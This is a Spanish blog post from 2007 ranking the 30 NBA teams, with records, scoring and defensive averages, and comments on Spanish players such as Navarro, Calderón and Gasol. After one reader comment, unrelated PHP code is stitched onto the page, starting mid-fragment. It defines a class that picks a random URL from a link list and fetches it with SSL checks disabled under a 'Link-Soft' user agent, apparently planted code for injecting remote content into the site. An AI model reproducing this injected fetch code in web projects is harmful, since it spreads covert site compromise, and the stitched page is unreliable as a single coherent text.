El termómetro de la NBA

19 de November de 2007 por telekoman

Llegó por fin la primera derrota de Boston, a manos de Orlando, que se sitúa en primera posición por derecho propio. La semana nos ha dejado grandes momentos de grandes equipos como New Orleans, San Antonio o Dallas que siguen engrasando sus maquinarias. Otros equipos como Minnesota o Seattle están abonados a sufrir y sus aficionados los saben. A destacar los batacazos de New Jersey, Houston e Indiana que han perdido parte del rédito conseguido en semanas anteriores.

En clave española resaltar el gran papel de Navarro, igualando el record de triples de un rookie que hasta el momento compartían jason Kidd y Chris Duhon con 8 triples de 9 intentos, Garbajosa jugando de nuevo 25 minutos y ganando, aunque fuera de manera efímera, y el primer doble-doble de la temporada de Calderón que parece empeñado en ponerle las cosas difíciles a su compañero TJ. Ford y a su entrenador. La vida sigue igual para Sergio Rodríguez, contando entre poco y nada para McMillan y Gasol dejándose llevar por un juego que no le conviene en absoluto.

Equipos que más suben: Washington (8), Milwaukee (7)

Equipos que más bajan: New Jersey (10), Houston (8) y New York (7)

Equipo (Posición anterior)

Balance Ataque / Defensa Comentario

1
Orlando (7)

9 – 2

102,8 (8) / 95,6 (11) Orlando se encarama al primer puesto de nuestro ranking tras una semana perfecta y habiendo sido los únicos en ganar a los todopoderosos Celtics. En su próxima visita a New Orleans y San Antonio veremos si Lewis, Howard y compañía son tan fieros como lo pintan. De momento son los líderes de la SouthEast y sin ganas de dejar de serlo.

2
New Orleans (8) 9 – 2

99,5 (12) / 90,5 (3)

Con un equipo con muchos posibles anotadores, los Hornets han ganado los 4 partidos de esta semana. Los equipos no eran de los mejores de la NBA, eso es cierto, pero no deja de tener mérito. David West 40 puntos antes Memphis, Chris Paul con 29 puntos y 13 asistencias y Chandler con 17 rebotes esimposible de superar. Los Hornets son líderes de la SouthWest por delante de Spurs, Mavericks y Rockets. Increible

3
Boston (1) 8 – 1 102,7 (9) / 89,4 (1)

8 seguidos sin perder, para empezar la temporada, es toda una declaración de intenciones. Y más cuando sigues teniendo la mejor defensa del campeonato. Estos Boston son mucho más que 3 estrellitas juntas, son un EQUIPO.


4
Phoenix (6) 8 – 2 107,0 (4) / 100,4 (19) La baja de Bell ha sido suplida con mucho acierto por Barbosa que ha sabido coger su aportunidad con 23 puntos de media. Pero el verdadero motor del equipo sigue siendo Nash que se ha marcado 14 asistencias de media. Los líderes de la división Pacific tendrán un doble encuentro con Sacramento y la visita de los Clippers, por lo que pueden tener otra semana perfecta.

5
San Antonio (2) 8 – 2 97,4 (19) / 89,9 (2) Semana complicada para los campeones, que se enfrentaban a algunos de los mejores equipos de la conferencia Oeste. Derrotados por Dallas en un partido en el que los Spurs olvidaron quienes son y dejaron a Duncan excesivamente sólo. Se enfrantarán a Orlando en un duelo Duncan – Howard que promete

6
Dallas (9) 7 – 2 103,3 (7) / 95,8 (12)

Sin estar totalmente engrasados y con un Nowitzky al 80%, los Mavericks han sido capaces de ganar a los Spurs. Terry y Josh Howard mantienen a Dallas a buen nivel, pero será necesario la aparición de su lider. Esta semana se enfrentan a Houston para ver quien es capaz de acercarse a los Hornets y los Spurs en una división SouthWest que está apasionante.


7
Denver (12) 7 – 3 109,0 (1) / 100,9 (20) Semana perfecta para Denver que de la mano de Iverson (27 puntos y 6 ,3 asistencias de media) y Melo(24 puntos, 5 asistencias y 5 rebotes) son el mejor ataque y que les ha servido para situarse como líderes de la NorthWest por delante de los irregulares Jazz. La semana se presenta asequible con Chicago, Clippers y Minnesota en el camino para visitar Houston.

8
Utah (5) 7 – 4 107,1 (3) / 102,2 (22) Tras un buen inicio de semana venciendo a Sacramento y Toronto, los Jazz se han dejado llevar perdiendo ante Cleveland e Indiana, este último de paliza. Si quieren asegurarse la primera posición de la NorthWest tendrán que dejar esta irregularidad, ya que Denver está ahí. Y esta semana Hornets y Pistons.

9
L.A. Lakers (15) 6 – 3 104,0 (5) / 97,7 (15)

El regreso de Odom ha sido fundamental en la buena semana de los Lakers que tras una previsible derrota frente a los Spurs, han conseguido ganar a Houston y a Detroit y apalizar a Chicago. Amenazan, pero ¿serán capaces de dar? En su gira por el este tendrán que enfrentarse a Boston y eso son palabras mayores


10
Detroit (4) 6 – 4 99,3 (14) / 95,6 (10) Mala semana para los Pistons que han perdido 3 de sus 4 encuentros ante rivales más que asequibles como Portland, Lakers y Sacramento. Han vuelto todos los titulares, pero las esperanzas en el banquillo han flojeado un poco. 3 partidos en casa deberán devolver las confianzas de los aficionados

11
Houston (3) 6 – 5 94,9 (22) / 93,5 (6) Semana Horribilus para los tejanos que han perdido sus 4 encuentros ante sus rivales del Oeste y a McGrady que se ha lesionado un codo, al parecer sin excesiva importancia. El ataque se ha resentido mucho y se ha vuelto a los viejos vicios. Mucho trabajo por hacer. La única luz en la niebla viene del esperado retorno de Francis que antes Phoenix anotó 8 puntos. Y el calendario no perdona y tienen que volver a enfrentarse a Dallas y a Denver.

12
L.A. Clippers (10) 5 – 4 96,9 (20) / 99,6 (18)

Los problemas de los Clippers se han incrementado esta semana y sólo han conseguido una victoria pírrica ante New York y dos abultadas derrotas frente a equipos que en las dos semanas anteriores calificabamos como inferiores (Warriors y Chicago). Y esta semana que viene Denver, Phoenix y New Orleans esperan impacientes. Kaman sigue siendo el mejor baluarte de un equipo irregular al que le costará meterse en playoffs en el duro Oeste.


13
Charlotte (18) 5 – 4 90,7 (26) / 93,9 (8) En la mejor temporada de los Bobcats de su corta historia, los Felton, Okafor, Wallace y compañía intentan clasificarse para playoffs por primera vez y tienen posibilidades. Pero deberán de dejar de lado su irregularidad y mejorar su promedio ofensivo. Al menos si quieren ganar a Orlando y Boston esta semana.

14
Cleveland (14) 5 – 5 99,6 (11) / 102,7 (23) Cleveland se mantiene en la mitad de la tabla tras ganar a Utah y perder ante Denver y Orlando, el primero de forma aplastante. Está claro que LeBron puede hacer muchas cosas, pero no puede hacerlo todo y los equipos se han reforzado mucho este año. La semana que empieza se presenta más favorable ante equipos teóricamente asequibles, pero si queiren mejorar tendrán que darle un empujon a su defensa y no permitir tantos puntos.

15
Toronto (13) 5 – 5 99,2 (15) / 95,4 (9)

Garbajosa juega minutos y Toronto gana a Indiana. Garbajosa no juega ni un minuto y Toronto pierde ante Golden State. Es una conlcusión poco objetiva, lo sé, pero es lo que le pide el cuerpo a los aficionados. Toronto defiende bien, pero no es nadie en los rebotes. Y esta semana 4 españoles en el mismo partido en el Memphis – Toronto, no hay que perdérselo.


16
Milwaukee (23) 4 – 4 94,4 (23) / 96,6 (14) Buena y relajada semana para los Bucks con victorias ante Memphis y Atlanta. Con Michael Redd en 26 puntos de media, Bogut 22 y 11 rebotes, y Mo Williams repartiendo 11 asistencias, la vida sonrié a los aficionados de Milwaukee. Visitar Cleveland y recibir a Lakers y Dallas será una prueba mucho mayor para un equipo que tiene posibilidades de alcanzar los playoffs si sigue a este ritmo.

17
Washington (25) 4 – 5 96,7 (21) / 97,8 (16) Incluso con la baja en el último partido de Arenas, los Wizards han conseguido una nueva victoria para dejar su casillero de derrotas semanales a cero, de la mano de Jamison. Estos Wizards darán alguna sorpresa puntual, pero les costará Dios y ayuda meterse en playoffs. Esta semana es fácil y podrán ponerse en positivo ante Philadelphia, Charllotte, Golden State y Memphis

18
Indiana (16) 4 – 6 100,3 (10) / 103,0 (25)

Los Pacers salvan a última hora el honor tras una victoria frente a Utah de 20 para evitar su septima derrota consecutiva. Esta vez sí consiguieron mantener la brecha que habían abierto en la primera mitad. Indiana es un equipo concebido para atacar, pero que estaba defendiendo excesivamente mal. Lo conseguido hoy tendrán que refrendarlo ante Lakers, Hornets, Dallas y Cleveland, por lo que es previsible que los Pacers sigan callendo.


19
Sacramento (20) 4 – 6 99,1 (16) / 104,5 (27) La vuelta de Artest y los promedios ofensivos de Kevin Martin consiguen que Sacramento mejore en un puesto su clasificación. Las victorias ante New York, con 41 puntos y 10 rebotes de K. Martin y sobre todo ante Detroit, dan mucha moral a unos Kings que están dispuestos a luchar por un puesto en Playoffs. Claro que con un doble enfrentamiento ante Phoenix, no parece especialmente fácil.

20
Portland (17) 4 – 6 93,7 (25) / 98,3 (17) Ganamos todo en casa, lo perdemos todo fuera. A Portland le afecta especialmente el jugar en su cancha donde se transforman en un buen equipo, o fuera, donde no dan pie con bola. Y esta semana tocó casi todo fuera. Les queda visitar Charlotte y luego recibir a los Nets y a los Kings. Veremos si la tendencia se repite.

21
New Jersey (11) 4 – 6 85,7 (30) / 93,7 (7)

Si la semana de Houston fue mala, la de New Jersey fue casi peor. Claro que el calendario tampoco ayudó. Hornets, Orlando y Boston, nuestro Top Three, pasaron por encima de una Nets que han acusado en exceso la baja de Carter y que se han dejado ganar incluso por Miami. Ni la buena forma de Jefferson ha conseguido hacer ganadores a estos Nets y 4 partidos a domicilio no parecen la mejor receta para el enfermo vuelva a la senda de la victoria


22
Atlanta (21) 3 – 6 98,7 (18) / 101,8 (21) Está claro que a los jovenes Hawks les falta experiencia para ganar. Este va a ser un año de sorpresas, pero de mala clasificación. Hortford sigue confirmando que bajo el tablero es un titán con 10 rebotes de media, lo que en su primer año le convierte en uno de los mejores rookies de la liga, y Joe Johnson y Josh Smith siguen manteniendo buenos promedios anotadores, pero falta algo… Esta semana se enfrentan a Spurs, Miami y Minnesota. Ganar uno sería normal, dos sería bueno, y los tres, un milagro.

23
Philadelphia (22) 3 – 6 89,1 (27) / 91,9 (5) La semana no presagiaba nada bueno, por lo que la victoria en casa frente a Portland debe considerarse como un gran paso para estos 76ers que no tienen una temporada fácil. Solamente Iguodala se mantiene partido tras partido y la ayuda de Dalember no parece suficiente. La aparición de Louis Williams en el panorama es esperanzadora, pero está verde aún y sólo el tiempo dirá si puede convertirse en un gran jugador.

24
Golden State (28) 2 – 6 108,9 (2) / 114,3 (30)

Parece que la experiencia de ganar su primer partido tras 6 derrotas ha sido satisfactoria para los Warriors que han conseguido de forma inmediata la segunda tras derrotar a Toronto esta noche. Tienen ls peor defensa de la liga con diferencia, pero con el segundo mejor ataque, no parece importarles demasiado, y más tras el retorno de Sthepen Jackson tras 7 partidos de suspensión. Esta semana les toca viajar por el Este enfrentándose a New York, Boston, Washington y Philadelphia. Seguro que dan más de una sorpresa.


25
Memphis (24) 2 – 7 104,0 (5) / 108,9 (29) Memphis sigue perdiendo, pero para nosotros las noticias son positivas. Navarro, 8 de 9 en triples en su primer año de novato para igualar el record que tienen desconocidos como Jason Kidd o Chris Duhon. Y titularidad ante Dallas al pertido siguiente. Lástima que los dos tiros últimos no entraran. Pero el equipo sigue esperando a Gasol, que está harto de correr oliendo poco la bola.

26
New York (19) 2 – 7 98,9 (17) / 104,1 (26) Tercer equipo que ha perdido sus 4 partidos esta semana, concluyendo con una sonrojante derrota por 32 ante los Nuggets. ¿Querían problemas? Pues ahí los tienen. Marbury desaparecido unos días y su equipo perdiendo. Una temporada más, el futuro es negro para los Knicks, pero nada que no pueda solucionar otro SG, ¿no Isiaah?

27
Chicago (26) 2 – 7 87,9 (28) / 96,4 (13)

Nadie es Chicago se esperaba este lamentable inicio tras la buena campaña anterior, y los ánimos están muy revueltos y no sería de extrañar que hubiera cambios próximamente. Esta semana se ha ganado a los Clippers, pero se ha perdido antes Phoenix y Lakers, este último de paliza y sin Deng. Hay jugadores irrecolnocibles como Hinrich o Gordon que deben mejorar si quieren ver a su equipo clasificado para PlayOffs. 3 salidas a Denver, New York y Toronto no parecen lo mejor para remontar el vuelo, pero nunca se sabe.


28
Miami (27) 2 – 8 86,0 (29) / 90,8 (4) Los aficionados de los Heat han esperado la vuelta de Wade como agua de Mayo, y por fin llueve en Miami. Con 23 puntos en los dos ñultimos partidos, parece que Flash ha vuelto para ganar, aunque ante Boston fue imposible, obviamente. Pero la semana no va a ser fácil con partidos ante Atlanta, Houston y Orlando.

29
Seattle (30) 2 – 9 99,4 (13) / 107,4 (28) Primer “Buzz shot” para Kevin Durant en la segunda victoria de Seattle que intenta salir del pozo como puede. Hay esperanzas para los Sonics, pero no para este año. Los 40 puntos de Wilkins ante Atlanta, o los 20-10 de Wilcox ante Miami, más los buenos detalles de Durant, hacen pensar que este equipo puede dar guerra en pocos años.

30
Minnesota (29) 1 – 7 94,0 (24) / 102,8 (24)

Un mal ataque y una mala defensa son características poco envidiables que hacen que los Timberwolves acaben la semana en el último lugar de la clasificación pese a haber ganado un partido frente a Sacramento. Con sólo dos hombres por encima de 10 puntos de media es dificil ganar los partidos.

Comenta

Un comentario a esta entrada

  1. xapa_croack dice:
    #1

    Otra vez igual :-(((

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>